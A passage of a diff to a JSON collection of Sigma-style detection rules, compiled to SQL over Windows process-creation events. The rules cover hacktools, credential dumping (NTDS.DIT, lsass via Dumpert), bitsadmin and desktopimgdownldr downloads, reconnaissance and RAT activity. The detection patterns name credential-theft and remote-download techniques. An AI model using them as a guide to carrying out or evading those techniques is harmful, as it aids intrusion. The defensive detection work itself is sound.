('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", - "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", - "tags": [ - "attack.command_and_control", - "attack.t1071" - ], + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "status": "experimental", + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "title": "File Download Via Bitsadmin To An Uncommon Target Folder", + "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "status": "test", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "PUA - Advanced Port Scanner Execution", - "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", - "status": "experimental", - "description": "Detects the use of Advanced Port Scanner.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Legitimate administrative use", - "Tools with similar commandline (very rare)" + "Legitimate use by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_advanced_port_scanner.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "Suspicious Firewall Configuration Discovery Via Netsh.EXE", - "id": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "title": "CMD Shell Output Redirect", + "id": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects the use of the redirection character \">\" to redicrect information in commandline", + "author": "frack113", "tags": [ "attack.discovery", - "attack.t1016" + "attack.t1082" ], "falsepositives": [ - "Administrative activity" + "Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%netsh %' ESCAPE '\\' AND CommandLine LIKE '%show %' ESCAPE '\\' AND CommandLine LIKE '%firewall %' ESCAPE '\\' AND (CommandLine LIKE '%config %' ESCAPE '\\' OR CommandLine LIKE '%state %' ESCAPE '\\' OR CommandLine LIKE '%rule %' ESCAPE '\\' OR CommandLine LIKE '%name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR CommandLine LIKE '%chrome-extension://%' ESCAPE '\\' OR CommandLine LIKE '%\\\\.\\\\pipe\\\\chrome.nativeMessaging%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_rules_discovery.yml" + "filename": "proc_creation_win_cmd_redirect.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "Suspicious High IntegrityLevel Conhost Legacy Option", + "id": "3037d961-21e9-4732-b27a-637bcc7bf539", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Very Likely, including launching cmd.exe via Run As Administrator" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'High' AND CommandLine LIKE '%conhost.exe%' ESCAPE '\\' AND CommandLine LIKE '%0xffffffff%' ESCAPE '\\' AND CommandLine LIKE '%-ForceV1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_conhost_legacy_option.yml" }, { - "title": "Persistence Via TypedPaths - CommandLine", - "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "title": "Stop Windows Service Via PowerShell Stop-Service", + "id": "c49c5062-0966-4170-9efd-9968c913a6cf", "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND CommandLine LIKE '%Stop-Service %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_typed_paths_persistence.yml" + "filename": "proc_creation_win_powershell_stop_service.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", + "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unlikely" + "Inventory tool runs", + "Administrative activity" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" + }, + { + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", - "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "title": "Fake Instance Of Hxtsr.exe", + "id": "4e762605-34a8-406d-b72e-c1a089313320", "status": "test", - "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", - "author": "frack113", + "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1036" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" + "filename": "proc_creation_win_hxtsr_masquerading.yml" }, { - "title": "Greedy File Deletion Using Del", - "id": "204b17ae-4007-471b-917b-b917b315c5db", + "title": "Remote File Download via Desktopimgdownldr Utility", + "id": "214641c2-c579-4ecb-8427-0cf19df6842e", "status": "experimental", - "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", - "author": "frack113", + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" + "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", - "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "Very unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "Suspicious Execution of Systeminfo", - "id": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", - "status": "experimental", - "description": "Detects usage of the \"systeminfo\" command to retrieve information", - "author": "frack113", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.impact", + "attack.t1490" ], 